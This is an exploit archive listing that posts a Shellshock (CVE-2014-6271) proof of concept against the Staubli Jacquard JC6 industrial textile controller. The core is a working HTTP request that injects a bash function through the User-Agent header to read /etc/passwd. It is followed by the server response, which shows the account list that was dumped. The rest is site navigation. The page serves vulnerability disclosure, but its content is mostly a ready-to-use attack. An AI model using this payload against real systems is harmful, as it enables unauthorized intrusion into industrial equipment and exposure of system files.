Twenty Year Anniversary

Staubli Jacquard Industrial System JC6 Shellshock

Staubli Jacquard Industrial System JC6 Shellshock
Posted Sep 21, 2018
Authored by t4rkd3vilz

Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability.

tags | exploit, bash
advisories | CVE-2014-6271
MD5 | ab496b513ca8eb64b58bc9279627e7c5

Staubli Jacquard Industrial System JC6 Shellshock

Change Mirror Download
# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment
Variable Handling Code Injection (Shellshock)
# Date: 21.09.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.staubli.com
# Software Link:
https://www.staubli.com/tr-tr/textile/textile-machinery-solutions/
# Version:JC6
# CVE: CVE-2014-6271
# Tested on: Linux

----------------------------#PoC#----------------------------

--------------> Request

GET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \"Content-type:
text/plain\"; echo; echo; echo $(</etc/passwd) Pragma: no-cache Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

--------------> Response

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<link href="/staubli.css" rel="stylesheet" type="text/css">
<title>root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login
user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John
Doe:/home/jdoe:/usr/bin/ksh</title>
</head>
<frameset rows="10%,90%" border=0>
<frameset cols="25%,75%" border=0>
<frame src="logo.html" name="logo" scrolling="no">
<frame src="/cgi-bin/title.cgi" name="title">
</frameset>
<frameset cols="25%,75%" border=0>
<frame src="menu_main.shtml" name="menu">
<frame src="main.shtml" name="main">
</frameset>
</frameset>
<noframe>
<body id="main">
Sorry your navigator doesn't accept frame.
</body>
</noframe>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    10 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close